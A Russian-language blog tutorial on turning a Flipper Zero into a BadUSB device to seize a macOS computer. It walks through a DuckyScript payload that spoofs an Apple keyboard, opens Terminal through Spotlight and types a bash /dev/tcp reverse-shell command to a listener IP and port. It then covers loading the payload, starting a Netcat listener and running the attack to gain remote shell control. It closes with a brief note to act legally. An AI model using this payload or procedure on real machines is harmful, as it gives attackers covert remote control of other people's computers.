Использование Flipper Zero для взлома macOS

Использование Flipper Zero взлом macOS

Вы наверное уже знаете, что такое BadUSB. Про хакерские флешки мы уже многократно рассказывали. Сегодня я познакомлю вас с еще одним хакерским устройством, которое может быть использовано в качестве BadUSB. Мы рассмотрим использование Flipper Zero, для создания полезной нагрузки, получения обратного подключения (реверс шелла) и взлома последней, обновленной версии macOS.

Использование Flipper Zero для взлома macOS

Портативный гаджет Flipper Zero — этакий мультитул хакеров и гиков, который только с виду напоминает игрушку, но способен на многое. Используется для проверки защищенности и взлома домофонов, радиопультов, шлагбаумов, телевизоров, бесконтактных карт. Он работает на базе микроконтроллера STM32WB55, представлен под лицензией GPL (с открытым исходным кодом).

Кроме всего перечисленного, устройство предлагает огромное количество различных полезных нагрузок, которые используются для взлома различных устройств.

Полезные нагрузки BadUSB

Flipper Zero BadUSB, а также некоторые другие устройств BadUSB используют полезные нагрузки, написанные на DuckyScript. Простой скриптовый язык для скрытого выполнения команд.

Для понимания работы Duckyscript пейлоадов, рекомендую посетить официальный сайт Hak5. Там вы найдете примеры и документацию по использованию DuckScript.

Создание скрипта DuckyScript

Вы можете использовать готовый скрипт или попробовать написать свой собственный. Давайте напишем простой скрипт (полезную нагрузку), после выполнения которого мы получим реверс-шелл (удаленный доступ) macOS.

Итак, откройте любой текстовый редактор и вставьте следующий код. Я буду использовать, установленный по умолчанию в macOS, текстовый редактор TextEdit.

Рассмотрим несколько команд, которые использует наш DuckyScript.

  • ID 05ac:021e Apple:Keyboard — строка сообщает macOS, что Flipper Zero является клавиатурой Apple. Если вы не используете эту строку, macOS отобразит диалоговое окно «Ассистент настройки клавиатуры», которое приведет к остановке работы скрипта.
  • DELAY — команда указывает операционной системе подождать некоторое время. Если мы не будем использовать эти задержки, скрипт будет работать слишком быстро и завершится ошибкой.
  • GUI SPACE — нажимает клавишу Apple Command и клавишу пробела, чтобы открыть окно поиска Spotlight.
  • STRING Terminal — вводит строку «Terminal» в окно поиска Spotlight.
  • ENTER — нажимает клавишу ENTER или Return на клавиатуре. После нажатия клавиши ENTER, система запускает окно терминала (/Applications/Utilities/Terminal).
  • STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1 — команда вводит текст в окно терминала, которое устанавливает соединение с сервером Netcat, прослушивающим ID-адрес 10.10.10.157 и порт 4444.

Измените IP-адрес 10.10.10.157 и порт 4444 на IP-адрес и порт вашего компьютера.

Сохраните этот файл на диске с названием rev_shell_macos.txt. В каталоге badusb на Flipper Zero нет организации подкаталогов, поэтому, если вы используете различные полезные нагрузки для разных операционных систем, используйте понятные названия.

Установка приложения qflipper

Если вы еще не установили приложение qflipper, перейдите на официальную страницу обновления Flipper Zero и выберите установщик для своей ОС. Это страница обновления прошивки, но внизу есть ссылки для скачивания файла установки qflipper.

Установка Duckyscript на Flipper Zero

Откройте приложение qflipper и нажмите на значок папки.

Установка Duckyscript на Flipper Zero

Чтобы просмотреть содержимое, нажмите на иконку SD-карты.

Установить Duckyscript на Flipper Zero

Найдите и перетащите файл rev_shell_macos.txt, который мы создали ранее, в папку badusb.

Установка Duckyscript Flipper Zero

После копирования, извлеките из компьютера Flipper Zero.

Запуск листенера

Flipper Zero BadUSB заряжен и готов к использованию. Но сначала нужно настроить на нашем компьютере (в моем случае Ubuntu) листенер для ожидания удаленного, входящего подключения.

Запустите листенер Netcat:

Реверс шелл Flipper Zero

Теперь, когда наш листенер Netcat готов и ожидает входящего соединения, мы можем приступить к атаке Flipper Zero BadUSB.

Запуск обратной оболочки BadUSB

Откройте меню Bad USB и нажмите на кнопку Run. Пока не подключайте Flipper Zero к компьютеру. Flipper Zero сообщит, когда следует подключить устройство.

Обратное подключение реверс шелл Flipper Zero macOS

Перейдите к файлу DuckyScript, который мы скопировали на предыдущем шаге.

Если вы не видите этот файл, значит, вы скопировали его не в тот каталог.

Выберите rev_shell_macos и нажмите кнопку «Run».

Использование Flipper Zero

После появления предупреждения «Connect to USB», можно подключать Flipper Zero к USB-порту iMac или MacBook и нажать кнопку «Run».

Инструкция Flipper Zero

На экране можно наблюдать за ходом выполнения скрипта BadUSB. После завершения процесса, можно будет отключить Flipper Zero.

Как использовать Flipper Zero

Удаленное управление компьютером macOS

Теперь у вас есть удаленный контроль над компьютером macOS. Теперь можно использовать инструменты терминала Unix и оболочку BASH, как если бы вы сидели за физической клавиатурой iMac.

Flipper Zero взлом macOS

Для навигации по файловой системе и управления операционной системой можно использовать обычные команды Linux, такие, как: whoami, pwd, ls или cd(см. Использование Netcat в пентесте)

Flipper Zero bad usb

Заключение

Теперь, после того, как вы научились использовать Flipper Zero в качестве BadUSB, можете создавать свои собственные скрипты. Используйте сайт Hak5 или один из многочисленных репозиториев DuckyScript GitHub, в качестве отправной точки для ваших собственных файлов Duckyscript.

Действуйте законно и этично. Используйте этот инструмент на устройствах, которыми владеете или с разрешением владельца.

ПОЛЕЗНЫЕ ССЫЛКИ:

ВКонтакте
OK
Telegram
WhatsApp
Viber

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *